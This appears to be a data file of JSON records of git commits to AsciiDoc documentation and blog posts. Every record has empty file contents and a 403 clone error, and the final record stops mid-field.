{"commit":"830dff9847bd5890f8ae7d22221f8072becfdc86","subject":"Fix typo in documentation","message":"Fix typo in documentation\n","repos":"costin\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_file":"docs\/src\/reference\/asciidoc\/core\/configuration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0288a429d1738477ad1cc5ee9b72e4ffa86610eb","subject":"Add router limits design docs","message":"Add router limits design docs\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design_docs\/design\/router-limits.adoc","new_file":"documentation\/design_docs\/design\/router-limits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"998334d94f17673c53d1febd96b88a7a812949fc","subject":"#56: started to extract tests from adoc files","message":"#56: started to extract tests from adoc files\n","repos":"marcphilipp\/junit-lambda,junit-team\/junit-lambda,marcphilipp\/junit5,sbrannen\/junit-lambda","old_file":"documentation\/src\/test\/java\/example\/writing-tests.adoc","new_file":"documentation\/src\/test\/java\/example\/writing-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marcphilipp\/junit5.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b150c185460f23d1a6b6b8d9d4a892c265b845db","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00f97b2218287d7326d9dd55fe15581fd11de100","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bd4992e5816dfadb1cc52aabd7803142772fd71","subject":"y2b create post How To Turn Air Into Drinking Water","message":"y2b create post How To Turn Air Into Drinking Water","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-21-How-To-Turn-Air-Into-Drinking-Water.adoc","new_file":"_posts\/2017-04-21-How-To-Turn-Air-Into-Drinking-Water.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a08f3457997d014edafda7ee18ffd6d23ebd7f9","subject":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","message":"Update 2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_file":"_posts\/2017-10-27-Nginxngx-small-lightminio-S3-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd87962819e54f3ee8c7ebe9af6b37f083cf31cd","subject":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","message":"Update 2016-10-04-iOS-10-Remote-Notification.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_file":"_posts\/2016-10-04-iOS-10-Remote-Notification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ed80db97f2245d3a2021ec6cdb6bfdf9d5353e3","subject":"Update 2015-02-10-RK.adoc","message":"Update 2015-02-10-RK.adoc","repos":"simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon,simonturesson\/hubpresstestsimon","old_file":"_posts\/2015-02-10-RK.adoc","new_file":"_posts\/2015-02-10-RK.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simonturesson\/hubpresstestsimon.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60865aa454ebbfe5a1f0c8adb1db379b5f926016","subject":"y2b create post Can This Case Fix The iPhone's Biggest Problem?","message":"y2b create post Can This Case Fix The iPhone's Biggest Problem?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-01-Can-This-Case-Fix-The-iPhones-Biggest-Problem.adoc","new_file":"_posts\/2016-12-01-Can-This-Case-Fix-The-iPhones-Biggest-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec73a6e18e2aa089cfe7947f71b1ee5077fe8dc8","subject":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","message":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c0acd6d128de9c87b5f6f8dea7e77a360f3d141","subject":"Update 2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","message":"Update 2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","new_file":"_posts\/2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a47d0e03ffc0d3fc9fd69a84125c6bad7f1e993","subject":"Update 2016-10-05-11092015-Maj-diagramme-createur.adoc","message":"Update 2016-10-05-11092015-Maj-diagramme-createur.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-05-11092015-Maj-diagramme-createur.adoc","new_file":"_posts\/2016-10-05-11092015-Maj-diagramme-createur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14d0e0f827e0b4e42c66fcc26f908f16e1718979","subject":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","message":"Update 2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_file":"_posts\/2016-08-08-Just-how-much-luggage-is-getting-lost-with-British-Airways.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40e411c7156648ae0cf347402c2ea555bd69f2ca","subject":"Adding target for ADD","message":"Adding target for ADD\n\nHi,\r\nJust a suggestion to add the target to the line of downloading the JDK9. Potentially consider making this line (with the download) the not-commented option to ensure the Dockerfile works first time a build is attempted.\r\nThanks,\r\nPeter Dam","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d526f05b93640a82a9bed75ba0ba0b416890ec7","subject":"add link to issue for root certs","message":"add link to issue for root certs\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_file":"developer-tools\/java\/chapters\/ch03-build-image-java-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41e1d8091f13894b7e22b94affa8569439e00f6d","subject":"build instructions","message":"build instructions\n","repos":"dmontag\/neo4j-enterprise,dmontag\/neo4j-enterprise","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dmontag\/neo4j-enterprise.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e037bcc5e9dcfa460eae969f1490812d2227bd3d","subject":"Start README.asciidoc","message":"Start README.asciidoc\n","repos":"rmuhamedgaliev\/JPS,rmuhamedgaliev\/JPS","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuhamedgaliev\/JPS.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b74e6e10078177f41786b4dac056412591671859","subject":"Fixes #1953: Add a readme for Rudder","message":"Fixes #1953: Add a readme for Rudder\n","repos":"ncharles\/rudder,fanf\/rudder,Kegeruneku\/rudder,jooooooon\/rudder,jooooooon\/rudder,Kegeruneku\/rudder,ncharles\/rudder,ncharles\/rudder,fanf\/rudder,jooooooon\/rudder,Kegeruneku\/rudder,fanf\/rudder","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kegeruneku\/rudder.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"1273b8af4ee8005efcf1b130990e63e6d4b92a5a","subject":"Update 2016-10-14-full-tank.adoc","message":"Update 2016-10-14-full-tank.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-14-full-tank.adoc","new_file":"_posts\/2016-10-14-full-tank.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a960cd37fe75bfe59c36f221fe6bc0f78022b644","subject":"Update 2017-04-08-Tea-Break.adoc","message":"Update 2017-04-08-Tea-Break.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-08-Tea-Break.adoc","new_file":"_posts\/2017-04-08-Tea-Break.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aae9fb7e41d486477dabf916c0f8d604374c64c1","subject":"Added an asciidoc version","message":"Added an asciidoc version\n","repos":"beloglazov\/openstack-centos-kvm-glusterfs","old_file":"doc\/openstack-centos-kvm-glusterfs-guide.asciidoc","new_file":"doc\/openstack-centos-kvm-glusterfs-guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beloglazov\/openstack-centos-kvm-glusterfs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fa64c62f2b66f10731df10dba75f9a746dbd678","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"847e1d6322a192e80a8105962e25a1fb26508570","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecbeffcb1eefdc9d9c7254f1f7587f1da113a784","subject":"Add note about min_score filtering efficiency (#23109)","message":"Add note about min_score filtering efficiency (#23109)\n\n* Add note about min_score filtering efficiency\r\n\r\n* Reword to mention 'HAVING'\r\n\r\n* Remove reference to HAVING\r\n","repos":"rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,MisterAndersen\/elasticsearch,jimczi\/elasticsearch,mikemccand\/elasticsearch,a2lin\/elasticsearch,obourgain\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,winstonewert\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,mohit\/elasticsearch,JackyMai\/elasticsearch,JSCooke\/elasticsearch,pozhidaevak\/elasticsearch,nezirus\/elasticsearch,Helen-Zhao\/elasticsearch,JSCooke\/elasticsearch,scottsom\/elasticsearch,alexshadow007\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,fernandozhu\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,StefanGor\/elasticsearch,naveenhooda2000\/elasticsearch,jprante\/elasticsearch,gingerwizard\/elasticsearch,njlawton\/elasticsearch,lks21c\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,LeoYao\/elasticsearch,shreejay\/elasticsearch,rlugojr\/elasticsearch,artnowo\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,obourgain\/elasticsearch,jprante\/elasticsearch,artnowo\/elasticsearch,maddin2016\/elasticsearch,elasticdog\/elasticsearch,a2lin\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,elasticdog\/elasticsearch,robin13\/elasticsearch,s1monw\/elasticsearch,scorpionvicky\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,vroyer\/elasticassandra,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,winstonewert\/elasticsearch,gingerwizard\/elasticsearch,wangtuo\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,naveenhooda2000\/elasticsearch,LewayneNaidoo\/elasticsearch,ZTE-PaaS\/elasticsearch,glefloch\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,mikemccand\/elasticsearch,MisterAndersen\/elasticsearch,nazarewk\/elasticsearch,Shepard1212\/elasticsearch,qwerty4030\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,MisterAndersen\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,JackyMai\/elasticsearch,s1monw\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,kalimatas\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,scottsom\/elasticsearch,glefloch\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,winstonewert\/elasticsearch,geidies\/elasticsearch,umeshdangat\/elasticsearch,nilabhsagar\/elasticsearch,vroyer\/elasticassandra,rajanm\/elasticsearch,fred84\/elasticsearch,gfyoung\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra,obourgain\/elasticsearch,mortonsykes\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,alexshadow007\/elasticsearch,rlugojr\/elasticsearch,s1monw\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,obourgain\/elasticsearch,qwerty4030\/elasticsearch,bawse\/elasticsearch,C-Bish\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,winstonewert\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,sneivandt\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,nazarewk\/elasticsearch,geidies\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,Helen-Zhao\/elasticsearch,nilabhsagar\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,C-Bish\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,JSCooke\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elasticassandra,geidies\/elasticsearch,JackyMai\/elasticsearch,LewayneNaidoo\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,njlawton\/elasticsearch,njlawton\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,mohit\/elasticsearch,rlugojr\/elasticsearch,nknize\/elasticsearch,Shepard1212\/elasticsearch,nknize\/elasticsearch,nilabhsagar\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,scottsom\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,Helen-Zhao\/elasticsearch,njlawton\/elasticsearch,JSCooke\/elasticsearch,ZTE-PaaS\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,elasticdog\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,StefanGor\/elasticsearch,markwalkom\/elasticsearch,bawse\/elasticsearch,markwalkom\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,lks21c\/elasticsearch,fernandozhu\/elasticsearch,shreejay\/elasticsearch,masaruh\/elasticsearch,IanvsPoplicola\/elasticsearch,mortonsykes\/elasticsearch,gingerwizard\/elasticsearch,nezirus\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra,scorpionvicky\/elasticsearch,i-am-Nathan\/elasticsearch,StefanGor\/elasticsearch,uschindler\/elasticsearch,qwerty4030\/elasticsearch,Shepard1212\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,glefloch\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,mikemccand\/elasticsearch,mortonsykes\/elasticsearch,a2lin\/elasticsearch,geidies\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,bawse\/elasticsearch,fred84\/elasticsearch,HonzaKral\/elasticsearch,Stacey-Gammon\/elasticsearch,markwalkom\/elasticsearch,bawse\/elasticsearch,ZTE-PaaS\/elasticsearch,strapdata\/elassandra,scottsom\/elasticsearch,elasticdog\/elasticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,StefanGor\/elasticsearch,IanvsPoplicola\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,nazarewk\/elasticsearch,fernandozhu\/elasticsearch,Shepard1212\/elasticsearch,rlugojr\/elasticsearch,i-am-Nathan\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,jprante\/elasticsearch,nknize\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,mortonsykes\/elasticsearch,MisterAndersen\/elasticsearch,a2lin\/elasticsearch,HonzaKral\/elasticsearch,nazarewk\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,LewayneNaidoo\/elasticsearch,LewayneNaidoo\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,scorpionvicky\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,vroyer\/elassandra,GlenRSmith\/elasticsearch,mikemccand\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,JackyMai\/elasticsearch,Shepard1212\/elasticsearch,njlawton\/elasticsearch,ZTE-PaaS\/elasticsearch,IanvsPoplicola\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mikemccand\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,StefanGor\/elasticsearch,qwerty4030\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,nazarewk\/elasticsearch,nknize\/elasticsearch,winstonewert\/elasticsearch,Stacey-Gammon\/elasticsearch,alexshadow007\/elasticsearch,Helen-Zhao\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,ZTE-PaaS\/elasticsearch,C-Bish\/elasticsearch","old_file":"docs\/reference\/query-dsl\/function-score-query.asciidoc","new_file":"docs\/reference\/query-dsl\/function-score-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92c2a4a270c05935ff81e769a14939216a2d0fa0","subject":"y2b create post The Most Comfortable Headphones Ever?","message":"y2b create post The Most Comfortable Headphones Ever?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-30-The-Most-Comfortable-Headphones-Ever.adoc","new_file":"_posts\/2016-07-30-The-Most-Comfortable-Headphones-Ever.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc7a72de2af994278508ad9df937311aac485295","subject":"Update 2017-11-30-Log-directly-to-Logstash-from-Payara.adoc","message":"Update 2017-11-30-Log-directly-to-Logstash-from-Payara.adoc","repos":"pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2017-11-30-Log-directly-to-Logstash-from-Payara.adoc","new_file":"_posts\/2017-11-30-Log-directly-to-Logstash-from-Payara.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/pdudits.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eab9c922a2c2861281c17e88775fdbb2d739ee3c","subject":"Update 2015-09-20-Python-re-module.adoc","message":"Update 2015-09-20-Python-re-module.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Python-re-module.adoc","new_file":"_posts\/2015-09-20-Python-re-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"498b1fa458d468720a70271323f80232949bb354","subject":"Update 2016-11-23-130000-JOB-OFFER.adoc","message":"Update 2016-11-23-130000-JOB-OFFER.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-23-130000-JOB-OFFER.adoc","new_file":"_posts\/2016-11-23-130000-JOB-OFFER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1c1a37be362d3f8fb05c5a310c97452a771a0fb","subject":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","message":"Update 2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_file":"_posts\/2016-07-24-Resurrecting-a-zombie-working-on-c11-cross-platform-game-engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7499d0a0d4619c65fd4d6aae10b1d2696f069c1d","subject":"Update 2016-06-04-Distributing-Common-Java-AP-I.adoc","message":"Update 2016-06-04-Distributing-Common-Java-AP-I.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-06-04-Distributing-Common-Java-AP-I.adoc","new_file":"_posts\/2016-06-04-Distributing-Common-Java-AP-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87e1d8c6fe08198455e260f30a95dfbccb94b6be","subject":"y2b create post They Call It The Hover 